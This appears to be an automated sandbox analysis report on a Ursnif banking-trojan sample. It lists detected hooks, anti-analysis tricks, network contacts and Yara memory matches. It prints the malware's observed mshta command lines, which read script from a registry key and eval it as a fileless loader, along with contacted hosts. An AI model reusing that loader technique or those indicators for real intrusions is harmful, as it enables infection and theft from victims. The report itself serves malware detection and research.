Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904 Thread sleep count: 167 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904 Thread sleep time: -37408s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4904 Thread sleep count: 69 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep time: -1773297476s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep count: 79 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep count: 49 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep count: 35 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4876 Thread sleep count: 89 > 30
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
Source: loaddll32.exe, 00000000.00000002.800825641.000000000122E000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.751002703.000000000330F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001753 LoadLibraryA,GetProcAddress, 0_2_10001753
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F008B1 mov eax, dword ptr fs:[00000030h] 0_2_00F008B1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F00576 mov eax, dword ptr fs:[00000030h] 0_2_00F00576
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F0099D mov eax, dword ptr fs:[00000030h] 0_2_00F0099D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F007C8 mov eax, dword ptr fs:[00000030h] 0_2_00F007C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F0090C mov eax, dword ptr fs:[00000030h] 0_2_00F0090C

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: aaaa.bar
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.220.111.98 187
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.802991988.00000000018A0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001E13 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_10001E13
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001EE5 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_10001EE5

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY